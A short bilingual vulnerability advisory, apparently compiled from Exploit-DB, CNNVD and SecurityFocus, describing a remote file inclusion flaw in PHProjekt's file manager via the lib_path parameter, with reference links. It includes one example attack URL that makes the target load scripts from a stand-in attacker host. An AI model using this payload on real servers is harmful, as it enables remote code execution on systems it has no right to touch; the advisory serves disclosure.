https://www.exploit-db.com/exploits/21343
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200208-004

PHPprojekt是一款免费开放源代码的PHP组件程序包、包括日历、项目管理、时间卡系统、文件管理、联系人管理、邮件客户端和其他9项模块。运行在多种Linux和Unix系统平台下，也可运行在MicrosoftWindows操作系统下。PHPprojekt在文件管理模块下存在漏洞，远程攻击者可以通过提交包含远程主机上的脚本代码进行攻击。攻击者可以通过直接访问文件管理模式和并指定模块包含远程攻击者控制主机下建立的任意文件进行攻击，如果远程包含的文件是PHP脚本，此脚本将被系统执行。问题存在于filemanager/filemanager_forms.php的第一行：include_once(“$lib_path/access_form.inc.php”);攻击者可能利用此漏洞以httpd的权限在目标系统执行任意命令。能否成功利用此漏洞依靠主机系统上的php配置，如果php.ini中的’all_url_fopen’选项被设置成’off’，此攻击将失败。

source: http://www.securityfocus.com/bid/4284/info

PHProjekt is a freely available, open source PHP Groupware package. It is actively maintained by the PHProjekt Development Team. It will run on most Linux and Unix variants, in addition to Microsoft Windows operating systems.

PHProjekt is prone to an issue which may allow an attacker to include arbitrary files located on a remote server. If the included file is a PHP script, this may allow for execution of arbitrary attacker-supplied code.

Successful exploitation depends partly on the configuration of PHP on the host running the vulnerable software. If 'all_url_fopen' is set to 'off' then exploitation of this issue may be limited. 

http://site.com/filemanager/filemanager_forms.php?lib_path=http://attacker.com/nasty/scripts

来源:BID
名称:4284
链接:http://www.securityfocus.com/bid/4284
来源:XF
名称:phpprojekt-filemanager-include-files(8448)
链接:http://www.iss.net/security_center/static/8448.php
来源:BUGTRAQ
名称:20020313Commandexecutioninphprojekt.
链接:http://www.securityfocus.com/archive/1/261676
来源:www.phprojekt.com
链接:http://www.phprojekt.com/modules.php?op=modload&name;=News&file;=article&sid;=19&mode;=ℴ=